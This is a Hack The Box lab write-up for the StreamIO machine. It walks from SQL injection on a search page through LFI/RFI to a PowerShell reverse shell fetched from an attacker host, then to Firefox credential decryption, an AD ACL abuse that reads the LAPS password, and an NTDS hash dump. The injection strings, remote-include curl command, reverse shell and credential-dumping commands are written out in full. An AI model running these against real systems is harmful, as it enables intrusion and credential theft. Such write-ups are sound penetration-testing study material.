HTB - StreamIO
Machine Info
StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection in order to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code for the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used in lateral movement. As the secondary user we found Firefox profile contains database which can extract saved credentials from it. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group in which they can read LDAP secrets. Without direct access to the account, we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then access LDAP to disclose the administrator LAPS password.
Enumeration
Scope
IP Address: 10.10.11.158
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p53,80,88,135,139,389,443,445,464,593,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-09 09:09:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
|_ssl-date: 2024-07-09T09:10:11+00:00; +7h00m03s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-09T09:09:33
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s* Open ports: 53,80,88,135,139,389,443,445,464,593,3268,3269,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - RPC - SMB - KERBEROS - LDAP - winRM
* Versions: IIS httpd 10.0
* Important Notes: Domain: streamIO.htb - DNS:watch.streamIO.htbBefore I start enumeration process, I will update /etc/hosts with the info from Nmap script output
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo sh -c "echo '$ip streamIO.htb watch.streamIO.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ tail -n1 /etc/hosts
10.10.11.158 streamIO.htb watch.streamIO.htbDNS Enumeration
I tried zone transfer but failed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ dig axfr streamIO.htb @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr streamIO.htb @10.10.11.158
;; global options: +cmd
; Transfer failed.RPC & SMB Enumeration
I got access denied when enumerating the two services
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbclient -N -L //$ip
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.11.158 445 DC [-] streamIO.htb\: STATUS_ACCESS_DENIED KERBEROS Enumeration
Then, I attempted to enumerate username looking for possible path but also nothing found
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list /usr/share/wordlists/seclists/Usernames/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/08 22:27:10 > Done! Tested 48705 usernames (0 valid) in 57.952 secondsHTTP & HTTPS enumeration
http://10.10.11.158
https://10.10.11.158
I tried fuzzing subdomains, but nothing found, however when I tried subdomain fuzzing against https protocol, I got a hit
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
<snip>
:: Progress: [19966/19966] :: Job [1/1] :: 444 req/sec :: Duration: [0:01:00] :: Errors: 0 ::┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
<snip>
watch [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 1478ms]https://watch.streamIO.htb
I looked at Wappalyzer to see what technology being used and PHP took my attention as it's not common to run php on IIS, So I attempted directory fuzzing against https://watch.streamIO.htb
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://watch.streamIO.htb/FUZZ -k -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 2171ms]
search.php [Status: 200, Size: 253887, Words: 1, Lines: 1, Duration: 3382ms]
Index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 867ms]Also, attempt php files fuzzing on https://steamIO.htb
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
index.php [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 366ms]
login.php [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 479ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 470ms]
about.php [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 786ms]
register.php [Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 841ms]
contact.php [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 1200ms]https://streamIO.htb/login.php
I don't have any credentials, So I will return if obtained one.
https://watch.streamIO.htb/search.php
It's a search function that searches of film name in specific table which can be considered as database, and we can attempt sql injection.
When I delivered a simple payload, I get blocked by some security defences in place
blocked.php
So, I can't use SQLMap and I will continue manually.
Something interesting took my attention here. when I type a word like man it matched it from both side.
It returns Batman, Anger Management so it uses wildcard such as *Search*.
The SQL Command maybe like this
SELECT * From movies where Film_name = '*input*'I can break the code with something like that input';--
SELECT * From movies where Film_name = '*input';-- *'I was right and when I typed man';-- It matches only wildcard from right side as we already escape the left side
Let's Create our exploit, I tried union 1,2,... until I got a hit at union 1,2,3,4,5,6
SELECT * From movies where Film_name = '*anything' union select 1,2,3,4,5,6 -- *'
Field 2 is got triggered So I will inject command on it
So, we're dealing with MSSQL database, we can use command from this cheat sheet:
Get the use name:
Current Database:
We're on MSSQL database, So one common attack vector is that we can get the hash on current use by executing the following command. I did it but failed as I got the machine account hash and couldn't be cracked
anthing' EXEC master..xp_dirtree '\\10.10.16.3\share\';--Continue to explore the database
We're already in STREAMIO, Let's explore the tables
When I provided an asterisk * it didn't return anything but when I provide username it returned list of usernames
when I provide password, it returned list of hashes, but I can't copy and paste them one by one, it's a waste of time
I looked at burp to see the HTML tag that the hashes is included in
So, I will use curl command to get a list of hashes and filter the results
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,password,3,4,5,6 FROM users;--" | grep '<h5 class="p-2">' | awk '{print $2}' | cut -d\> -f2 | tee -a hashes.txt
<snip>
0049ac57646627b8d7aeaccf8b6a936f
08344b85b329d7efd611b7a7743e8a09
083ffae904143c4796e464dac33c1f7d
0cfaaaafb559f081df2befbe66686de0
<snip>I will do the same thing with usernames
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,username,3,4,5,6 FROM users;--" | grep '<h5 class="p-2">' | awk '{print $2}' | cut -d\> -f2 | tee -a users.txt
<snip>
Theodore
Victor
Victoria
William
yoshihideInitial Access
The username list is big for brute forcing so I will try to know who is really has account on the machine by enumerating Kerberos
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d streamIO.htb -t 100 -o users.list ./users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/09 00:35:59 > [+] VALID USERNAME: yoshihide@streamIO.htbI got a user's list and hashes list, Let's attempt to crack the hashed and then try brute forcing.
First, Start hashcat in auto-detection mode the know the type of hash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat hashes.txt /usr/share/wordlists/rockyou.txt ======+============================================================+===================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
70 | md5(utf16le($pass)) | Raw Hash
2600 | md5(md5($pass)) | Raw Hash salted and/or iterated
3500 | md5(md5(md5($pass))) | Raw Hash salted and/or iterated
4400 | md5(sha1($pass)) | Raw Hash salted and/or iterated
20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash salted and/or iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash salted and/or iterated
1000 | NTLM | Operating System
9900 | Radmin2 | Operating System
8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)Not all the hash cracked but we will be fine with what we found
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
<snip>
Session..........: hashcat
Status...........: Exhausted
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show
08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
3577c47eb1e12c8ba021611e1280753c:highschoolmusical
54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
665a50ac9eaa781e4f7f04199db97a11:paddpadd
6dcd87740abb64edfa36d170f0d5450d:$3xybitch
b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
ef8f3d30a856cf166fb8215aca93e9ff:%$clara
f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$Creating passwords list for brute forcing
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show | cut -d: -f2 | tee -a pass.lst
<snip>
highschoolmusical
$hadoW
paddpadd
<snip>Unfortunately, I didn't get a hit when I tried brute forcing
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u yoshihide -p pass.lst
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:##123a8j8w5123## STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:$monique$1991$ STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:highschoolmusical STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:$hadoW STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:paddpadd STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:$3xybitch STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:!5psycho8! STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:66boysandgirls.. STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:!?Love?!123 STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:physics69i STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:%$clara STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:!!sabrina$ STATUS_LOGON_FAILURE I remember the login.php page that I left behind as I didn't have any credentials.
Intercept the request and send it to intruder and then start the attack with passwords we have
Fuzzing for '/admin' directory and parameters
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
images [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 694ms]
admin [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 1498ms]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/admin/FUZZ -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 901ms]
master.php [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 617ms]https://streamio.htb/admin/master.php
There is a missing parameter or something, Let's try parameter fuzzing
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u https://streamIO.htb/admin/?FUZZ= -t 200 -k -fs 1678 -H "Cookie: PHPSESSID=nnt2pl59ell9hqjdvu82ugegpf"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
debug [Status: 200, Size: 1712, Words: 90, Lines: 50, Duration: 987ms]
movie [Status: 200, Size: 320235, Words: 15986, Lines: 10791, Duration: 596ms]
user [Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 1524ms]
staff [Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 8876ms]https://streamio.htb/admin/?debug=
I tried LFI in this parameter and I got a hit https://streamio.htb/admin/?debug=C:\Windows\System32\drivers\etc\hosts
I will use this vulnerability to read the content of master.php using php wrapper
Shell as yoshihide
echo "onlyPGgxPk1vdmllIG1hbmFnbW......." | base64 -d | tee -a master.phpThe file is check it has to be included
cat master.php
<?php
if(!defined('included'))
die("Only accessable through includes");
<snip>Looking at the end of code, It takes the input in parameter include in POST request.
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" )
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?> I will include master.php from https://streamio.htb/admin/?debug= and append inlcude parameter to the POST request to meet the conditions.
We have found LFI before but RFI didn't work on Debug= parameter, So I will try RFI on include parameter
we got a hit, Let's create a webshell for us.
system("PowerShell -c powershell -e <base64>");┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -XPOST https://streamio.htb/admin/?debug=master.php -d "include=http://10.10.16.3/shell.php" -H "Cookie: PHPSESSID=nujp4k6q68sd43p4jc439fuepo" -k┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.158] 59891
PS C:\inetpub\streamio.htb\admin> I looked around, found login.php and decided to explore its content
PS C:\inetpub\streamio.htb> dir
Directory: C:\inetpub\streamio.htb
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:49 AM admin
d----- 2/22/2022 2:49 AM css
d----- 2/22/2022 2:49 AM fonts
d----- 2/22/2022 2:49 AM images
d----- 2/22/2022 3:19 AM js
-a---- 2/23/2022 2:16 AM 4341 about.php
-a---- 2/23/2022 2:16 AM 1357 about_include.php
-a---- 2/23/2022 2:16 AM 2908 contact.php
-a---- 2/23/2022 2:16 AM 1706 contact_include.php
-a---- 7/30/2021 1:57 AM 1150 favicon.ico
-a---- 2/22/2022 3:21 AM 1812 header_include.php
-a---- 2/25/2022 11:57 PM 7337 index.php
-a---- 2/23/2022 2:16 AM 2415 info_include.php
-a---- 2/26/2022 8:27 AM 3938 login.php
-a---- 2/23/2022 2:16 AM 216 logout.php
-a---- 2/25/2022 11:42 PM 4480 register.php
PS C:\inetpub\streamio.htb> type login.php
<snip>
<?php
$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
function bad_char_check($nameI searched for other passwords that maybe exists and find one
PS C:\inetpub\streamio.htb> ls -Force | select-string -pattern "PWD"
login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');It's a password for mssql database
db_user:'B1@hB1@hB1@h'
db_admin:'B1@hx31234567890'Shell as nikk37
Let's examine the db with SQLCMD tool
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_user -P 'B1@hB1@hB1@h' -Q "select @@version"
----------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
(1 rows affected)PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "use streamio_backup"
Changed database context to 'streamio_backup'.
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "SELECT table_name FROM streamio_backup.INFORMATION_SCHEMA.TABLES"
table_name
----------------------------------------------------------------------------------------
movies
users
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -d 'streamio_backup' -Q "select * from users"
id username password
----------- -------------------------------------------------- -------------------------
1 nikk37 389d14cb8e4e9b94b137deb1caf0612a
2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
3 James c660060492d9edcaa8332d89c99c9239
4 Theodore 925e5408ecb67aea449373d668b7359e
5 Samantha 083ffae904143c4796e464dac33c1f7d
6 Lauren 08344b85b329d7efd611b7a7743e8a09
7 William d62be0dc82071bccc1322d64ec5b6c51
8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5 shorten our users list by ensuring that the username already exists
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list ./backup_users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/09 03:41:07 > [+] VALID USERNAME: yoshihide@StreamIO.htb
2024/07/09 03:41:07 > [+] VALID USERNAME: nikk37@StreamIO.htbOnly one hash was cracked, So it must be for one of the two users
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 backup_hashes /usr/share/wordlists/rockyou.txt
389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2xxxxxxxxxxxx Confirm
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'nikk37' -p 'get_dem_girls2xxxxxxxxx'
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:get_dem_girls2xxxxxxxxx┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ evil-winrm -i $ip -u nikk37 -p 'get_dem_girls2xxxxxxxxxx'
*Evil-WinRM* PS C:\Users\nikk37\Documents> type ..\Desktop\user.txt
a00c4e521d2bed26c166xxxxxxxxxxxxxUser Flag: a00c4e521d2bed26c166xxxxxxxxxxxxx
Privilege Escalation
I found that the system has Mozilla Firefox installed, So I looked at the user Mozilla profile and I copied it to my kali machine to try decrypt the Firefox secrets and cookies
Start SMB Server
──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbserver
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed*Evil-WinRM* PS C:\Users\nikk37> net use z: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.
*Evil-WinRM* PS C:\Users\nikk37> copy -r AppData\Roaming\Mozilla\FireFox\Profiles\br53rxeg.default-release\ z:I change directory the folder I copied from windows box and start firepwd.py to decrypt Firefox secrets.
┌──(kali㉿kali)-[~/…/HTB/machines/StreamIO/br53rxeg.default-release]
└─$ python3 /opt/firepwd/firepwd.py
<snip>
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'I found some credentials let's try them on brute forcing account
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u fire_users -p admin_passwords
<snip>
SMB 10.10.11.158 445 DC [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0rI fired up bloodhound to see what the user
JDgoddcan do and file the following:JDgoddCanwriteOwneronCORE STAFFgroup which enable use to add ourselves in that groupCORE STAFFgroup has the rights to readLAPSpassword on theDCmachine
Let's list the command we will use for that purpose:
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('STREAMIO.HTB\JDGodd', $SecPassword)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"I personally use crackmapexec to pull the laps
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'JDGodd' -p 'JDg0dd1s@d0p3cr3@t0r' --laps
SMB 10.10.11.158 445 DC [-] DC\administrator:G58E)u0@)96rU1 STATUS_LOGON_FAILURE Alternative way from the community using ldapsearch
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ldapsearch -H ldap://10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
<snip>
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: G58E)u0@)96rU1┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ impacket-psexec streamip.htb/administrator@$ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
<snip>
C:\Windows\system32> type C:\Users\Martin\Desktop\root.txt
fcca05f1388d18d964521ce53582793┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u administrator -p 'G58E)u0@)96rU1' --ntds
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [+] streamIO.htb\administrator:G58E)u0@)96rU1 (Pwn3d!)
SMB 10.10.11.158 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.158 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:63ab0c9344ca0c42ce367de76cafec16:::
SMB 10.10.11.158 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.158 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
SMB 10.10.11.158 445 DC JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
SMB 10.10.11.158 445 DC Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
SMB 10.10.11.158 445 DC nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
SMB 10.10.11.158 445 DC yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
SMB 10.10.11.158 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:8f92fd746817af09faa8257dfc127736:::
SMB 10.10.11.158 445 DC [+] Dumped 8 NTDS hashes to /home/kali/.cme/logs/DC_10.10.11.158_2024-07-09_083839.ntds of which 7 were added to the databaseRoot Flag: fcca05f1388d18d964521ce53582793
Last updated